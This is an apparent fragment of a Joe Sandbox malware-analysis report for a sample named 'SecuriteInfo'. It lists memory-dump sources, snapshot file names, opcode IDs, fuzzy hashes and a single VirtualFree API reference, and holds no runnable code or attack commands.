                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 020947ccbdb28eb617e6e248aef44207cbda2eaea5ef03a792c75e2bd99c66a7
                                                                          • Instruction ID: 8ba24827e72aa5d89af8083f4dd4024aca3141bbe0dc10c1762ca390e0aa5533
                                                                          • Opcode Fuzzy Hash: 020947ccbdb28eb617e6e248aef44207cbda2eaea5ef03a792c75e2bd99c66a7
                                                                          • Instruction Fuzzy Hash: C941B170E05A688BDB24CB64CC90BAE77B5FF85301F2881E9D409A7641D2789E81CF41
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: f67703f65752f9bb783298760f3026c310286a0fbd9c9b3517f2bd8a1bd19493
                                                                          • Instruction ID: 0748f08c88b1012081b5a0d40642daa05e79213c031707e9085de05d22375fb9
                                                                          • Opcode Fuzzy Hash: f67703f65752f9bb783298760f3026c310286a0fbd9c9b3517f2bd8a1bd19493
                                                                          • Instruction Fuzzy Hash: 293107B2E01318EBEB348A64CC48BAA7779FBC5320F1541F9E50DA6180D678AFC08F51
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API String ID:
                                                                          • Opcode ID: 8d384786852dea43d839b7f94240c3766a7c002dc60b6da3fb40e0a9e3153081
                                                                          • Instruction ID: 00dc6297dc14308acb52810ba3b2716d06badde9ad61e3f86a7202915bd6c4be
                                                                          • Opcode Fuzzy Hash: 8d384786852dea43d839b7f94240c3766a7c002dc60b6da3fb40e0a9e3153081
                                                                          • Instruction Fuzzy Hash: 4691E1B2D042289EFB248A24DC44BEA7775FF81314F1181FAE40DA6680D7795FC68F51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0f6c36041ada84158ebae67b112162f90e1c67adb9b0208e3f049be2ce11f961
                                                                          • Instruction ID: 360bb6408479b6d5958b31a2772b271e48ae1101f944a2295fe82def2014536c
                                                                          • Opcode Fuzzy Hash: 0f6c36041ada84158ebae67b112162f90e1c67adb9b0208e3f049be2ce11f961
                                                                          • Instruction Fuzzy Hash: 7251BFB5C042388ADB218B14CD44AFEB7B6FF88315F1191FAE80DA6640DA794EC1CF51